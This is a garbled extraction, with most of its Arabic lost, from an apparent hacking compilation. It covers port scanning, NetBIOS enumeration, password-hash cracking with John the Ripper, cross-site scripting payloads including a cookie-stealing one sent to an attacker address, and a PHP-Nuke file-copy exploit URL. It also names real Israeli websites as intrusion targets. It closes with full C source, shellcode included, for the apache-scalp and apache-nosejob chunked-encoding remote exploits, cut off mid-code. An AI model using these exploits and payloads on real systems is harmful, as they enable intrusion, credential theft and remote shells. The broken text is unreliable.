/home/site/public_html

725

/home/site/www

**-----------------------------------
-3


.

726

727

" " anmap


><
> : <
:
- nmap
:
-
:

728

.

.

:
UDP
()TCP connect
(TCP SYN (half open
(ftp proxy (bounceattack
Reverse-ident
(ICMP (ping sweep
FIN
ACK sweep
Xmas Tree
SYN sweep
.and Null scan
. ..:
remote OS detection via TCP/IP
fingerprinting
729

stealth scanning
dynamic delay and
retransmission calculations
parallel scanning
detection of down hosts via parallel
pings
decoy scanning port
filtering detection
direct (non-portmapper) RPC
scanning
fragmentation scanning
flexible target and port specification


.

730

)(




)(





:
. .
731

TCP sequencability



.

732

"
"
> <
><network access :
.
.

733


.


.





)
(
%50
%50


. .
. . .

734


aswind.COM
ip

INTERNIC.NET


INTERNIC.NET
:
NSLOOKUP
SET TYPE = ALL
aswind.COM
:
Domain Name: ASWIND.COM
.Registrar: ONLINENIC, INC
Whois Server: whois.OnlineNIC.com
Referral URL:
/http://www.onlinenic.com
Name Server: DNS.ASWIND.COM
735

Name Server: NS1.ASWIND.COM


Updated Date: 01-apr-2002
. aswind.com
. DNS = 2
2. DNS
DNS

DNS
DNS

Ip
aswind.com
6 .
IP
. DNS
DNS
. WIN2K DNS

DNS
736

DNS
.

HowIS
IP

LMHOSTS
NetBios IP

C
200.200.200.0 LMHOSTS
NetBios = N2
200.200.200.2 Net
view //servername N1
N254

1 254

.
\
737

Administrator





Windwos


.
username and password
net user



. . .


.

. . .
738

Messenger Service .
NetBios

. IP 200.200.200.200
. nbtstat -a
200.200.200.200
.
MSBROWSER )
(
John IP
200.200.200.50
Nbtstat -a 200.200.200.50
john
johnPC
. )
( Administrator

. Messenger Service
)
(
MSBROWSER
739

nbtstat -a




.


nt senstiver
)
(.



l0pthcrack .

740

741

" " Cross Site Scripting


> <
><tcp :
:
HTML
JAV
742

ASCRIPT ,PERL ,CGI ,VBSCRIPT




=============================
=============================
=============================
========

:
* .
.
* VBULLETIN
YaBB and UBB

*.

743

*
=============================
=============================
=============================
=========
:




...
...
=============================
=============================
=============================
744

=========
:

...


.

.



:
745

Hello FOLKS board. This is a


.message
><SCRIPT>malicious code</SCRIPT
.This is the end of my message
malicious code

...


HTML
>script>document.write('<img
src="http://my_ip_address/'+docum
<ent.cookie+'">';</script
746


>A
HREF="http://example.com/commen
?t.cgi
mycomment=<SCRIPT>malicious
<code</SCRIPT>"> Click here</A

comment.cgi



mycomment
747


. .
:
>A
HREF="http://example.com/commen
t.cgi? mycomment=<SCRIPT
SRC='http://badsite/badfile'></SCRIPT>"> Click
<here</A
.
748



BADFILE

.
cross-site scripting
" " .



CSS
cross-site scripting
CASCADE style sheets

749

>SCRIPT>, <OBJECT>, <APPLET>,


<and <EMBED
><form
. HTML

=============================
============================
:

750

http://www.cert.org/advisorie
s/CA-2000-02.html

http://www.perl.com/pub/a/20
02/02/20/css.html

" "
751

> <
> :<
,
...
, - - -
- ......


........... :
.
.
.
.
.
.
.
.
.
.
.
752

.
.

:
=============================
=====================
=
h3>put your text
--><here<xmp><plaintext
=============================
=====================

put your text


.... here ....

753

:
=====
!

" "
> <
><Dr^FunnY :
...
html


.....
754

...
"
"
"
... "HTML ...
(:
.



.

755

" "
756

> <
= Exploit =
:
.

..

:
-1

super scan
.
-2 . .
.

. .
.
www.netcraft.net
!.!!..
. ...
757

-3

-4




/....../www.thesite.com
:
*pl.


Active Perl

* c.

*sh.


www.securiteam.com
www.securityfocus.com
www.ukrt.f2s.com
758

www.ussrback.com
www.packetstorm.securify.co
m
www.secureroot.com
www.rootshell.com

.



.


..
shadowed .encryption

root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer
Admin:/usr/spool/lp:
759

smtp:x:0:0:Mail Daemon User:/:


uucp:x:5:5:uucp
Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp


...
x
..
:
root:x:0:1:Super-
User:/:/sbin/sh

root:Q71KBZlvYSnVw:0:1:SuperUser:/:/sbin/sh
= root .
= x

shadowed


shadow file
760

= token
Linux :
/etc/shadow
*=
token
SunOS : /etc/shadow
* = token
FreeBSD : /etc/master.passwd or
x = * /etc/shadow
token
IRIX :
/etc/shadow
token = x
AIX :
/etc/security/passwd
!=
token
ConvexOS : /etc/shadow or
/etc/shadpw
* = token

761

root:EpGw4GekZ1B9U:11390::::::
::::::bin:NP:6445:::::: sys:NP:6445
adm:IyEDQ6VoRlLHM:10935::::::
#admin:9z8VMm6Ovcvsc:10935::::::
::::::lp:NP:6445

EpGw4GekZ1B9U



John the ripper
.
.

x

:

john passwd
passwd

:
762

by Sola 97,John the Ripper Version


1.3 Copyright (c) 1996
Loaded 1 password
**v: 0 c: 6401 t: 0:00:00:01 99% c/s:
6401 w: *****DONE



john.pot
.
.

" "
> <
>< icer :
763

. :
1
2 )
(
3 ...
4 ...

: a face at the interface


.
. ..
.
...

http ..
. scanner
....
BOF (buffer over flow) , DoS ( denial
, (of service
. DoS
...
764



....

DoS
.
. DoS GET /
POST
OVERLOAD
)
24 (
.... OFFLINE

..
. ..
765




. ..

threads
cgi scaners

..
...
<<< shadow security scaner
.....
rootshell.com


red hat 7.2

...... red hat 7.2

766


2
)
( shadow
..
...
url
.. ..
url
rootshell.com

%99
..
.......

3 :
767


..
..
commands ..


, http BOF
..
..

....

config.inc

... DES/MD5 /
.... etc/passwd ...
.
DoS
. DoS

768

...
..

4 :

:
packetstorm.securify.com
/.securityfocus.com
/www.insecure.org
/www.rootshell.com
.(:

769

" "
><
><oOoDa BE$T :
:
txt. :
..

770

,..
..
c. :
..
..
)_ (compile
)(_ .
...
.. Linux
.. Shell Account

:
>---- gcc filenmae.c
:
>--- a.out ..


..
:
771

a.out xxx.xxx.xxx.xxx/.
:
pl. :
Linux ..
Shell Account
: exploit
perl filename.pl xxx.xxx.xxx.xxx

filename xxx.xxx.xxx.xxx/.

772

"
"
> .<
><DeadLine :
:
:
Microsoft-IIS/5.0 on Windows 2000

98
.
98 :
Web Folders :
:
:
773

My Computer

My Computer

Web Folders
:
Add Web Folder

: Add Web Folder
Type the location to add
. :
/http://hostname.com
hostname

774




:
mail.talcar.co.il
daihatsu-israel.co.il
daewoo-israel.co.il

:
/http://192.117.143.121
Next :


:
finish
Web Folder :
775


:
http://www.israwine.co.il/
212.199.43.84
:



.

776

777

" "

<>
>Arab VireruZ :>
:
twlc: here your 0day from LucisFero
and supergate
Posted on Monday, September 24 @
14:25:58 CDT
topic: advisories
twlc security divison
24/09/2001
.Php nuke BUGGED
:Found by
LucisFero and supergate
778

twlc/.
Summary
This time the bug is really
dangerous...it allows you to 'cp' any
file on the box... or even upload
...files
Systems Affected
all the versions ARE vulnerable
except '5.0 RC1' (i wonder why a
released c. is ok while the final 5.2
(is bugged
Explanation
?Do you need sql password
http://www.server.net/admin.php?
upload=1&file=config.php&file_nam
e=hacked.txt&wdir=/images/&userfil
e=config.php&userfile_name=hacke
d.txt
779

the admin 'login' page will be


prompted just go to
http://www.server.net/images/hacke
d.txt and you will see config.php
that as everyone knows contain the
sql's passwords, you can even
upload files...i leave you the 'fun' to
find all the ways to use it... and try
to dont be a SCRIPT KIDDIE we
wrote this advisory to help who
runs php nuke and NOT TO LET
.YOU HAVE FUN
let me explain you the bug...
:admin.php contains this routine
basedir =$
;(dirname($SCRIPT_FILENAME
;textrows = 20$
;textcols = 85$
;(udir = dirname($PHP_SELF$
;"/"=if(!$wdir) $wdir
780

;"if($cancel) $op="FileManager
} (if($upload
copy($userfile,$basedir.$wdir.
;($userfile_name
lastaction = ""._UPLOADED."$
;"$userfile_name --> $wdir
This need a rewrite //
-------------------------------------> OMG!
WE TOTALY AGREEEEEEEE lmao
;("include("header.php//
;(GraphicAdmin($hlpfile//
;()html_header//
;()displaydir//
;"/"=wdir2$
;(chdir($basedir . $wdir2
;()CloseTable//
;("include("footer.php//
Header("Location: admin.php?
;("op=FileManager
;exit
{
781

that doesnt do a check to see if you


are logged as admin or no... so you
...can use it anyway
Solution
we erased the function... cause we
wanted to remove the file manager
anyway but i suggest you to do the
-same... -to upload files use FTP
:conclusions
yet another bug of php nuke... this
software is used by thousands of
people... (we run something based
on it too) i hope that this time the
author will reply soon and will
release a patch too! as i said before
just dont try to be a script kiddie or
we simply WONT post anymore this
kind of advisories. Prolly the funny
thing is that who first discovered
the bug was LucisFero that... 2
782

hours before didnt knew php ... so i


(supergate) fear him and you should
.too
:posted at
http://www.twlc.net article
http://www.twlc.net/article.php?
sid=421
bugtraq@securityfocus.com
-http://www.phpnuke.org -good luck
http://sourceforge.net/tracker/?
group_id=7511 Project: PHP-Nuke
Web Portal System
and of course mailed to the author
of php nuke
contacts (bugs, ideas, insults, cool
girls... remember that trojans are
:(directed to /dev/null
lucisfero@twlc.net
supergate@twlc.net
783

http://www.twlc.net (yes we are


(patched
.peace out pimps. bella a tutti
eof
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:
basedir =$
;(dirname($SCRIPT_FILENAME
;textrows = 20$
;textcols = 85$
;(udir = dirname($PHP_SELF$
;"/"=if(!$wdir) $wdir
;"if($cancel) $op="FileManager
} (if($upload
copy($userfile,$basedir.$wdir.
784

;($userfile_name
lastaction = ""._UPLOADED."$
;"$userfile_name --> $wdir
This need a rewrite //
-------------------------------------> OMG!
WE TOTALY AGREEEEEEEE lmao
;("include("header.php//
;(GraphicAdmin($hlpfile//
;()html_header//
;()displaydir//
;"/"=wdir2$
;(chdir($basedir . $wdir2
;()CloseTable//
;("include("footer.php//
Header("Location: admin.php?
;("op=FileManager
;exit
{
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:
785

http://www.server.net/admin.php?
upload=1&file=config.php&file_nam
e=hacked.txt&wdir=/images/&userfil
e=config.php&userfile_name=hacke
d.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=

http://www.server.net/admin.php?
upload=1&file=config.php&file_nam
e=ultramode.txt&wdir=/&userfile=co
nfig.php&userfile_name=ultramode.
txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:
786

= config.php ultramode.txt


(-:

http://server.com/ultramode.txt
=-

-1 server.com
-2 :
http://server.com/nuke
-3 5.2
.

787

788

" " Chunked

> <angels-bytes
Chunked Apache
. angels-bytes
Retina
Apache Chunked Scanner
. 254
.


789

2.0.39

http://www.apache.org/dist/httpd/bi
naries

1.3.24 2 2
dev-2.0.36



))*/ angels-
bytes.com ((
790

/*
/** /
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#

define EXPLOIT_TIMEOUT 5 /* num#


seconds to wait before assuming it
/* failed
define RET_ADDR_INC 512#

define#
791

MEMCPY_s1_OWADDR_DELTA
-146
define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#

define REP_POPULATOR 24#


define REP_RET_ADDR 6#
define REP_ZERO 36#
define REP_SHELLCODE 24#
define NOPCOUNT 1024#
define NOP 0x41#
'\\define PADDING_1 \\'A#
'\\define PADDING_2 \\'B#
'\\define PADDING_3 \\'C#
define PUT_STRING(s) memcpy(p,#
;(s, strlen(s)); p += strlen(s
define PUT_BYTES(n, b)#
;memset(p, b, n); p += n
792

define#
SHELLCODE_LOCALPORT_OFF 30
= []char shellcode
\\\\ "\\\
x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x
\10
\\\
x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\x
\\b8
"\\\x1f\\
\\\\ "\\\
x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x
\7a
\\\
x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x
\\7a
"\\\x02\\
\\\\ "\\\
x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x
\90
793

\\\
xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x
\\24
"\\\x04\\
\\\\ "\\\
x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\x
\c7
\\\
x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x
\\00
"\\\xb8\\
\\\\ "\\\
x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x
\ff
\\\
x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x
\\08
"\\\x03\\
\\\\ "\\\
x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x
\0b
\\\
794

x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x
\\01
"\\\x89\\
\\\\ "\\\
xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x
\6a
\\\
x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\x
\\cd
"\\\x80\\
\\\\ "\\\
x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x
\2f
\\\
x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\x
\\c0
"\\\x50\\
\\\\ "\\\
x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x
\50
\\\
xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\
795

\\x80
;"\\\xcc\\

} struct
;char *type
;u_long retaddr
targets[] = { // hehe, yes theo, that {
!say OpenBSD here
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.20\\\", 0xcf92f
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.22\\\", 0x8f0aa
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.24\\\", 0x90600
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.20\\\", 0x8f2a6
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.23\\\", 0x90600
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.24\\\", 0x9011a
OpenBSD 3.1 x86 / Apache"\\\ }
796

,{ 1.3.24 #2\\\", 0x932ae


;{

} ([]int main(int argc, char *argv


;char *hostp, *portp
;unsigned char buf[512], *expbuf, *p
;int i, j, lport
;int sock
;int bruteforce, owned, progress
;u_long retaddr
;struct sockaddr_in sin, from

} (if(argc != 3
;([printf(\\\"Usage: %s \\\\n\\\", argv[0
printf(\\\" Using targets:\\\\t./apache;("\\\scalp 3 127.0.0.1:8080\\\\n
printf(\\\" Using
bruteforce:\\\\t./apache-scalp
;("\\\0x8f000 127.0.0.1:8080\\\\n
797

printf(\\\"\\\\n--- --- - Potential targets


;("\\\list - --- ----\\\\n
printf(\\\"Target ID / Target
;("\\\specification\\\\n
(++for(i = 0; i < sizeof(targets)/8; i
printf(\\\"\\\\t%d / %s\\\\n\\\", i,
;(targets[i].type
;return -1
{

;("\\\:"\\\ ,[hostp = strtok(argv[2


if((portp = strtok(NULL, \\\":\\\")) ==
(NULL
;"\\\portp = \\\"80
;(retaddr = strtoul(argv[1], NULL, 16
} (if(retaddr < sizeof(targets)/8
;retaddr = targets[retaddr].retaddr
;bruteforce = 0
{
798

else
;bruteforce = 1

;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
for(owned = 0, progress = 0;;retaddr
} (+= RET_ADDR_INC
/* skip invalid return adresses */
;i = retaddr & 0xff
(if(i == 0x0a || i == 0x0d
;++retaddr
else if(memchr(&retaddr, 0x0a, 4) ||
((memchr(&retaddr, 0x0d, 4
;continue

sock = socket(AF_INET,
;(SOCK_STREAM, 0
;sin.sin_family = AF_INET
sin.sin_addr.s_addr =
799

;(inet_addr(hostp
;((sin.sin_port = htons(atoi(portp
(if(!progress
;("\\\ ..printf(\\\"\\\\n[*] Connecting
;(fflush(stdout
if(connect(sock, (struct sockaddr *)
} (& sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n

Setup the local port in our */


/* shellcode
;(i = sizeof(from
if(getsockname(sock, (struct
} (sockaddr *) & from, &i) != 0
;("\\\()perror(\\\"getsockname
800

;(exit(1
{
;(lport = ntohs(from.sin_port
shellcode[SHELLCODE_LOCALPOR
;T_OFF + 1] = lport & 0xff
shellcode[SHELLCODE_LOCALPOR
;T_OFF + 0] = (lport >> 8) & 0xff

p = expbuf = malloc(8192 +
((PADSIZE_3 + NOPCOUNT + 1024)
(* REP_SHELLCODE
PADSIZE_1 + (REP_RET_ADDR *)) +
4) + REP_ZERO + 1024) *
;((REP_POPULATOR
PUT_STRING(\\\"GET /
HTTP/1.1\\\\r\\\\nHost: apache;("\\\scalp.c\\\\r\\\\n
(++for (i = 0; i < REP_SHELLCODE; i
801

}
;("\\\-PUT_STRING(\\\"X
PUT_BYTES(PADSIZE_3,
;(PADDING_3
;("\\\ :"\\\)PUT_STRING
;(PUT_BYTES(NOPCOUNT, NOP
memcpy(p, shellcode,
;(sizeof(shellcode) - 1
;p += sizeof(shellcode) - 1
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
(++for (i = 0; i < REP_POPULATOR; i
}
;("\\\-PUT_STRING(\\\"X
PUT_BYTES(PADSIZE_1,
;(PADDING_1
;("\\\ :"\\\)PUT_STRING
} (++for (j = 0; j < REP_RET_ADDR; j
;p++ = retaddr & 0xff*
;p++ = (retaddr >> 8) & 0xff*
;p++ = (retaddr >> 16) & 0xff*
802

;p++ = (retaddr >> 24) & 0xff*


{
;(PUT_BYTES(REP_ZERO, 0
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
PUT_STRING(\\\"Transfer-Encoding:
;("\\\chunked\\\\r\\\\n
snprintf(buf, sizeof(buf) 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\",
;(PADSIZE_2
;(PUT_STRING(buf
PUT_BYTES(PADSIZE_2,
;(PADDING_2
snprintf(buf, sizeof(buf) 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\",
;(MEMCPY_s1_OWADDR_DELTA
;(PUT_STRING(buf
;(write(sock, expbuf, p - expbuf
803

;++progress
(if((progress%70) == 0
;progress = 1
} (if(progress == 1
;((memset(buf, 0, sizeof(buf
sprintf(buf, \\\"\\\\r[*] Currently using
retaddr 0x%lx, length %u, localport
,"\\\%u
retaddr, (unsigned int)(p - expbuf),
;(lport
memset(buf + strlen(buf), \\' \\', 74 ;((strlen(buf
;(puts(buf
(if(bruteforce
;('\\;'\\)putchar
{
else
;('\\putchar((rand()%2)? \\'P\\': \\'p

;(fflush(stdout
804

} (while (1
;fd_set fds
;int n
;struct timeval tv
;tv.tv_sec = EXPLOIT_TIMEOUT
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
if(select(sock + 1, &fds, NULL,
} (NULL, &tv) > 0
} ((if(FD_ISSET(sock, &fds
if((n = read(sock, buf, sizeof(buf) (1)) <= 0
;break
if(!owned && n >= 4 &&
memcmp(buf, \\\"\\\\nok\\\\n\\\", 4) ==
805

} (0
printf(\\\"\\\\nGOBBLE GOBBLE!@#
;("\\\%%)*#\\\\n
printf(\\\"retaddr 0x%lx did the
;(trick!\\\\n\\\", retaddr
sprintf(expbuf, \\\"uname -a;id;echo
hehe, now use 0day OpenBSD local
kernel exploit to gain instant
;("\\\r00t\\\\n
;((write(sock, expbuf, strlen(expbuf
;++owned
{
;(write(1, buf, n
{
} ((if(FD_ISSET(0, &fds
if((n = read(0, buf, sizeof(buf) - 1)) <
(0
;(exit(1
;(write(sock, buf, n
806

{
{
(if(!owned
;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
fprintf(stderr, \\\"Ooops..
;("\\\hehehe!\\\\n
;return -1
{
{
;return 0
{
807

:Exploit #2
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
__ifdef __linux#
include#
endif#

define HOST_PARAM \\\"apache-#


/* nosejob.c\\\" /* The Host: field
define DEFAULT_CMDZ \\\"uname#
-a;id;echo \\'hehe, now use another
808

bug/backdoor/feature (hi Theo!) to


"\\\gain instant r00t\\';\\\\n
define RET_ADDR_INC 512#

define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#

define REP_POPULATOR 24#


define REP_SHELLCODE 24#
define NOPCOUNT 1024#
define NOP 0x41#
'\\define PADDING_1 \\'A#
'\\define PADDING_2 \\'B#
'\\define PADDING_3 \\'C#
define PUT_STRING(s) memcpy(p,#
;(s, strlen(s)); p += strlen(s
define PUT_BYTES(n, b)#
809

;memset(p, b, n); p += n
= []char shellcode
\\\\ "\\\
x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\x
\e3
\\\
x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\x
\\c6
"\\\x04\\\\x24\\
\\\\ "\\\
x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x
\31
\\\
xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\x
\\d1
"\\\xea\\\\x31\\
\\\\ "\\\
xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\
\x02
\\\
x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x
810

\\80
"\\\x7c\\\\x24\\
\\\\ "\\\
x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x
\89
\\\
x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x
\\04
"\\\x20\\\\x89\\
\\\\ "\\\
x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x
\0c
\\\
x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x
\\24
"\\\x14\\\\x89\\
\\\\ "\\\
x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x
\18
\\\
x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x
\\5d
811

"\\\xcd\\\\x80\\
\\\\ "\\\
x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x
\27
\\\
x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\x
\\ff
"\\\x04\\\\x24\\
\\\\ "\\\
x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x2
\4
\\\
xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x5
\\1
"\\\x50\\\\xb0\\
\\\\ "\\\
x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\
\x58
\\\
x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x
\\58
"\\\x41\\\\x80\\
812

\\\\ "\\\
xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x
\90
\\\
x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\x
\\c0
"\\\xb0\\\\x5a\\
\\\\ "\\\
xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x
\80
\\\
x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x
\\31
"\\\xc0\\\\x50\\
\\\\ "\\\
xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x
\24
\\\
x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x
\\68
"\\\x2a\\\\x47\\
\\\\ "\\\
813

x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x
\50
\\\
x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\
\\x04
"\\\xcd\\\\x80\\
\\\\ "\\\
x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x
\73
\\\
x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x
\\89
"\\\xe3\\\\x50\\
\\\\ "\\\
x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x
\50
;"\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc \\\
;
} struct
char *type; /* description for newbie
/* penetrator
814

/* !int delta; /* delta thingie


/* u_long retaddr; /* return address
int repretaddr; /* we repeat retaddr
/* thiz many times in the buffer
int repzero; /* and \\\\0\\'z this many
/* times
targets[] = { // hehe, yes theo, that {
!say OpenBSD here
FreeBSD 4.5 x86 /"\\\ }
Apache/1.3.23 (Unix)\\\", -150,
,{ 0x80f3a00, 6, 36
FreeBSD 4.5 x86 /"\\\ }
Apache/1.3.23 (Unix)\\\", -150,
,{ 0x80a7975, 6, 36
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.20\\\", -146, 0xcfa00, 6, 36
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.22\\\", -146, 0x8f0aa, 6, 36
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.24\\\", -146, 0x90600, 6, 36
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.24 #2\\\", -146, 0x98a00, 6, 36
815

OpenBSD 3.1 x86 / Apache"\\\ }


,{ 1.3.20\\\", -146, 0x8f2a6, 6, 36
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.23\\\", -146, 0x90600, 6, 36
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.24\\\", -146, 0x9011a, 6, 36
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.24 #2\\\", -146, 0x932ae, 6, 36
OpenBSD 3.1 x86 / Apache"\\\ }
1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00,
,{ 6, 36
NetBSD 1.5.2 x86 / Apache"\\\ }
1.3.12 (Unix)\\\", -90, 0x80eda00, 5,
,{ 42
NetBSD 1.5.2 x86 / Apache"\\\ }
1.3.20 (Unix)\\\", -90, 0x80efa00, 5,
,{ 42
NetBSD 1.5.2 x86 / Apache"\\\ }
1.3.22 (Unix)\\\", -90, 0x80efa00, 5,
,{ 42
NetBSD 1.5.2 x86 / Apache"\\\ }
1.3.23 (Unix)\\\", -90, 0x80efa00, 5,
816

,{ 42
NetBSD 1.5.2 x86 / Apache"\\\ }
1.3.24 (Unix)\\\", -90, 0x80efa00, 5,
,{ 42
;victim ,{

} (void usage(void
;int i
printf(\\\"GOBBLES Security
Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apache;("\\\nosejob.c\\\\n\\\\n
printf(\\\"Usage: ./apache-nosejob <;("\\\switches> -h host[:80]\\\\n
printf(\\\" -h host[:port]\\\\tHost to
;("\\\penetrate\\\\n
printf(\\\" -t #\\\\t\\\\t\\\\tTarget
;("\\\id.\\\\n
printf(\\\" Bruteforcing options (all
required, unless -o is
817

;("\\\used!):\\\\n
printf(\\\" -o char\\\\t\\\\tDefault
values for the following
;("\\\OSes\\\\n
printf(\\\" \\\\t\\\\t\\\\t(f)reebsd,
;("\\\(o)penbsd, (n)etbsd\\\\n
printf(\\\" -b 0x12345678\\\\t\\\\tBase
;("\\\address used for bruteforce\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry
0x80000/obsd, 0x80a0000/fbsd,
;("\\\0x080e0000/nbsd.\\\\n
printf(\\\" -d -nnn\\\\t\\\\tmemcpy()
delta between s1 and addr to
;("\\\overwrite\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd,
;("\\\-150/fbsd, -90/nbsd.\\\\n
printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of
time to repeat \\\\\\\\0 in the
;("\\\buffer\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry 36 for
openbsd/freebsd and 42 for
;("\\\netbsd\\\\n
818

printf(\\\" -r #\\\\t\\\\t\\\\tNumber of
times to repeat retadd in the
;("\\\buffer\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry 6 for
openbsd/freebsd and 5 for
;("\\\netbsd\\\\n
;("\\\printf(\\\" Optional stuff:\\\\n
printf(\\\" -w #\\\\t\\\\t\\\\tMaximum
number of seconds to wait for
;("\\\shellcode reply\\\\n
printf(\\\" -c cmdz\\\\t\\\\tCommands
to execute when our shellcode
;("\\\replies\\\\n
printf(\\\" \\\\t\\\\t\\\\taka
;("\\\auto0wncmdz\\\\n
printf(\\\"\\\\nExamples will be
published in upcoming apache;("\\\scalp-HOWTO.pdf\\\\n
printf(\\\"\\\\n--- --- - Potential targets
;("\\\list - --- ---- ------- ------------\\\\n
printf(\\\" ID / Return addr / Target
;("\\\specification\\\\n
819

for(i = 0; i <
(++sizeof(targets)/sizeof(victim); i
printf(\\\"% 3d / 0x%.8lx / %s\\\\n\\\",
;(i, targets[i].retaddr, targets[i].type
;(exit(1
{

} ([]int main(int argc, char *argv


char *hostp, *portp, *cmdz =
;DEFAULT_CMDZ
;u_char buf[512], *expbuf, *p
;int i, j, lport, sock
int bruteforce, owned, progress,
;sc_timeout = 5
;int responses, shown_length = 0
;struct in_addr ia
;struct sockaddr_in sin, from
;struct hostent *he

820

(if(argc < 4
;()usage
;bruteforce = 0
;((memset(&victim, 0, sizeof(victim
while((i = getopt(argc,
(argv, \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1
}
} (switch(i
/* required stuff */
:'\\case \\'h
;("\\\:"\\\ ,hostp = strtok(optarg
if((portp = strtok(NULL, \\\":\\\")) ==
(NULL
;"\\\portp = \\\"80
;break
/* predefined targets */
:'\\case \\'t
